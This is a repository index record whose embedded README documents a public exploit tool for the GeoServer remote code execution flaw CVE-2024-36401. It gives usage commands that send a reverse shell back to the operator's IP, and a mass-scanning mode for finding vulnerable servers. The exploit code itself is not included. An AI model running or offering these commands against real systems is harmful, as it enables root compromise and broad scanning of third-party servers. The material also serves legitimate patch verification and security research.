{"id":22799795,"url":"https://github.com/chocapikk/cve-2024-36401","last_synced_at":"2025-10-04T19:10:54.256Z","repository":{"id":251201604,"uuid":"835900082","full_name":"Chocapikk/CVE-2024-36401","owner":"Chocapikk","description":"GeoServer Remote Code Execution","archived":false,"fork":false,"pushed_at":"2025-04-06T16:50:10.000Z","size":388,"stargazers_count":78,"open_issues_count":0,"forks_count":12,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-03T05:23:21.877Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chocapikk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-30T18:43:40.000Z","updated_at":"2025-04-19T14:12:08.000Z","dependencies_parsed_at":"2024-08-01T13:23:58.595Z","dependency_job_id":"c66cc356-b692-4e7c-ad39-664641087ff0","html_url":"https://github.com/Chocapikk/CVE-2024-36401","commit_stats":null,"previous_names":["chocapikk/cve-2024-36401"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Chocapikk/CVE-2024-36401","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-36401","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-36401/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-36401/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-36401/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chocapikk","download_url":"https://codeload.github.com/Chocapikk/CVE-2024-36401/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-36401/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278359906,"owners_count":25974191,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-04T02:00:05.491Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-12T07:09:59.343Z","updated_at":"2025-10-04T19:10:54.220Z","avatar_url":"https://github.com/Chocapikk.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 GeoServer Exploit for CVE-2024-36401 🚀\n\n## 📝 Description\n\n**GeoServer** is an open-source Java-based software server that enables users to view, edit, and share geospatial data. It offers a versatile and efficient solution for distributing geospatial information from various sources such as GIS databases, web-based data, and personal datasets.\n\nIn versions of GeoServer earlier than **2.23.2**, **2.23.6**, versions **2.24.0** to **2.24.3**, and version **2.25.0**, there exists a vulnerability (**CVE-2024-36401**) that permits Remote Code Execution (RCE) by unauthenticated users. This issue arises from the unsafe evaluation of property names as XPath expressions in multiple OGC request parameters.\n\nExploiting this vulnerability, an attacker can send a POST request containing a malicious XPath expression, which can result in arbitrary command execution as root on the system running GeoServer.\n\n## 🛠️ Setup\n\n### Requirements\n\nInstall the required libraries using pip:\n\n```sh\npip install -r requirements.txt\n```\n\n### Repository Setup\n\n1. Clone the repository:\n\n   ```sh\n   git clone https://github.com/Chocapikk/CVE-2024-36401.git\n   cd CVE-2024-36401\n   ```\n\n## 🚀 Usage\n\n### Command-Line Options\n\nBelow is an explanation of the command-line options you can use with the exploit script:\n\n```plaintext\nUsage: exploit.py [OPTIONS]\n\nOptions:\n  --url, -u          TEXT     Target URL for the exploit\n  --remote-ip, -ip   TEXT     Your IP for the reverse shell\n  --remote-port, -rp INTEGER  Port for the reverse shell\n  --bind-host, -bh   TEXT     Local bind host for the listener\n  --bind-port, -bp   INTEGER  Local bind port for the listener\n  --proxy, -p        TEXT     Proxy URL, e.g., http://localhost:8080\n  --check, -c        TEXT     File containing URLs to scan\n  --output, -o       TEXT     Output file for vulnerable URLs\n  --threads, -t      INTEGER  Number of threads for scanning (default: 10)\n  --help                      Show this message and exit.\n```\n\n### Single Target Exploit\n\nTo exploit a single target, use the following command with the required parameters:\n\n```sh\npython exploit.py -u \u003ctarget_url\u003e -ip \u003cyour_ip\u003e -rp \u003cyour_port\u003e [--proxy \u003cproxy_url\u003e] [--bind-host \u003cbind_host\u003e] [--bind-port \u003cbind_port\u003e]\n```\n\n#### Example:\n\n```sh\npython exploit.py -u http://localhost:8080 -ip 192.168.1.36 -rp 1337 --proxy http://127.0.0.1:8081\n```\n\n### Mass Scanning\n\nThe exploit script also supports mass scanning of URLs for vulnerable GeoServer versions. You can specify a file containing a list of URLs and an optional output file to save the results.\n\n#### Usage:\n\n```sh\npython exploit.py --check \u003cfile_with_urls\u003e [--threads \u003cnumber_of_threads\u003e] [--output \u003coutput_file\u003e]\n```\n\n#### Example:\n\n```sh\npython exploit.py --check urls.txt --threads 10 --output vulnerable_urls.txt\n```\n\nThis will scan the URLs listed in `urls.txt` using 10 threads and save any vulnerable URLs found to `vulnerable_urls.txt`.\n\n## 📜 Example Output\n\nHere is an example of the output you might see when running the exploit:\n\n![GeoServer Exploit Example](img/geov2.png)\n![GeoServer Exploit Example](img/geov2-mass.png)\n\n\n## 🙏 Credits\n\nThis exploit code was created by:\n- [Chocapikk](https://github.com/Chocapikk)\n- [K3ysTr0K3R](https://github.com/K3ysTr0K3R)\n\n## ⚠️ Disclaimer\n\nThis exploit is for educational purposes only. Use it at your own risk. The author is not responsible for any damage caused by this code.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-36401","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchocapikk%2Fcve-2024-36401","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-36401/lists"}